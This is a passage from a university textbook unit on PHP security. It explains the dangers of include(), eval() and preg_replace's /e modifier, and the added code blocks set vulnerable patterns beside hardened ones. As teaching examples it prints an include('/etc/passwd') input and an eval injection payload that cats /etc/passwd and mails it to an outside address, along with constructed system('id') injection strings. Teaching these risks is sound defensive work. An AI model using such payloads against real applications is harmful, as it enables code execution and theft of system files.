Unit 14: Security
the script running the code. It is not hard to see why this is a problem—type this into the form:
include('/etc/passwd');
Unfortunately, there’s no easy way to ensure that a script like this can ever be secure.
You can globally disable particular function calls by listing them, separated by commas, in the
disable_functions configuration option in php.ini. For example, you may never have need for
the system( ) function, so you can disable it entirely with:
disable_functions = system
This does not make eval( ) any safer, though, as there’s no way to prevent important variables
from being changed or built-in constructs such as echo( ) from being called.
Note that the preg_replace( ) function with the /e option also calls eval( ) on PHP code, so do
not use user-supplied data in the replacement string.
In the case of include, require, include_once, and require_once, your best bet is to turn off remote
file access using allow_url_fopen.
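As an added illustration that is not part of the textbook, the fragment below places the unsafe include() pattern the text warns about next to a hardened version. The hardened version never lets request data become a file name: the user's value is only a key into a fixed map, and realpath() confirms the resolved file still lies under the template directory. The directory layout, the map contents and the `page` parameter are assumptions for the example. Note that allow_url_fopen and allow_url_include cannot be changed with ini_set() at runtime; they have to be set in php.ini.

```php
<?php
// Added example, not code from the textbook.

// VULNERABLE: the request value flows straight into include().
// ?page=/etc/passwd discloses a local file, and with allow_url_fopen on
// a remote URL would be fetched and executed as PHP.
function render_page_unsafe(string $page): void
{
    include($page);
}

// HARDENED: request data is only ever a key; the file names are fixed here.
// (Assumed template names for the example.)
const PAGE_MAP = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of the template for $page, or null if the key is
// unknown or the resolved file is outside $base_dir.
function resolve_page(string $page, string $base_dir): ?string
{
    if (!array_key_exists($page, PAGE_MAP)) {
        return null;                        // unknown key: refuse, do not guess
    }
    $root = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . PAGE_MAP[$page]);
    // Defence in depth: even a bad entry in PAGE_MAP cannot escape $base_dir.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render_page(string $page, string $base_dir): void
{
    $path = resolve_page($page, $base_dir);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include($path);
}

// Usage, assuming templates live in ./pages beside this script:
// render_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
```

The php.ini side of the same defence is `allow_url_fopen = Off` and `allow_url_include = Off`; the map-based lookup above is what protects against the local-file case, which those settings do not cover.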
The main message of this is that any use of eval( ) and the /e option with preg_replace( ) is
suspect, especially if you allow users to put bits into the code. Consider the following:
eval("2 + $user_input");
It seems pretty innocuous. However, suppose the user enters the following value:
2; mail("l33t@somewhere.com", "Some passwords", `/bin/cat /etc/passwd`);
In this case, both the expression you expected and a command you would rather had not run will be executed.
The only viable solution is to never give user-supplied data to eval( ).
eval() is a useful but very dangerous function that allows you to execute a
string as PHP code. There are not many occasions where this is necessary,
and being realistic you should avoid its usage, especially if you want to use
user input in the string.
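The following added example (not the textbook's code) shows the eval("2 + $user_input") case from the text together with the two ways of getting the same result without handing user data to eval(): validate the input as a plain integer and do the arithmetic in PHP, or, where a small expression language is really wanted, parse a grammar you control. It also shows preg_replace_callback() as the replacement for the /e modifier mentioned above (/e was deprecated in PHP 5.5 and removed in PHP 7.0). All inputs are constructed.

```php
<?php
// Added example, not code from the textbook.

// VULNERABLE: whatever the user typed becomes PHP source. The value
// '2; mail(...)' from the text runs as a second statement.
function add_two_unsafe(string $user_input)
{
    return eval("return 2 + $user_input;");
}

// SAFER 1: insist on a plain integer; eval() is not used at all.
function add_two(string $user_input): ?int
{
    if (!preg_match('/^-?\d{1,9}$/', $user_input)) {
        return null;                        // anything else is rejected
    }
    return 2 + (int) $user_input;
}

// SAFER 2: a tiny expression language (integers joined by + or -) parsed by
// hand. A ';' or a function name can never satisfy the grammar, so it can
// never become code.
function eval_sum(string $expr): ?int
{
    if (!preg_match('/^\s*-?\d{1,9}(\s*[+-]\s*\d{1,9})*\s*$/', $expr)) {
        return null;
    }
    $compact = preg_replace('/\s+/', '', $expr);
    preg_match_all('/[+-]?\d+/', $compact, $m);   // "2+3-4" -> ["2","+3","-4"]
    return array_sum(array_map('intval', $m[0]));
}

// preg_replace() with /e ran the replacement string through eval(). With
// preg_replace_callback() the callback is ordinary PHP and the matched text
// is only ever data, so a match containing PHP syntax is harmless.
function uppercase_words(string $text): string
{
    return preg_replace_callback('/\b[a-z]+\b/', function (array $m): string {
        return strtoupper($m[0]);
    }, $text);
}

// Constructed inputs:
var_dump(add_two('40'));                       // int(42)
var_dump(add_two('2; mail("x@y", "s", `id`)')); // NULL (rejected)
var_dump(eval_sum('2 + 3 - 4'));               // int(1)
var_dump(eval_sum('2; system("id")'));         // NULL (rejected)
var_dump(uppercase_words('hello <?php ?> world')); // "HELLO <?php ?> WORLD"
```

The design point is that each safe version decides what the input is allowed to be and computes the result itself; none of them tries to "clean" a string before passing it to eval(), because there is no reliable way to do that.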
14.6 Shell Commands
The command shell is a separate software program that provides direct communication
between the user and the operating system. The non-graphical command shell user interface
provides the environment in which you run character-based applications and utilities. The
command shell executes programs and displays their output on the screen by using individual
characters similar to the MS-DOS command interpreter Command.com. The Windows XP
command shell uses the command interpreter Cmd.exe, which loads applications and directs
the flow of information between applications, to translate user input into a form that the
operating system understands.
You can use the command shell to create and edit batch files (also called scripts) to automate
routine tasks. For example, you can use scripts to automate the management of user accounts or
nightly backups. You can also use the Windows Script Host, CScript.exe, to run more sophisticated
scripts in the command shell. You can perform operations more efficiently by using batch files
than you can by using the user interface. Batch files accept all commands that are available at
the command line. For more information about batch files and scripting,
You can customize the command prompt window for easier viewing and to increase control
over how you run programs.
Be very wary of using the exec( ), system( ), passthru( ), and popen( ) functions and the
backtick (``) operator in your code. The shell is a problem because it recognizes special characters
LOVELY PROFESSIONAL UNIVERSITY 361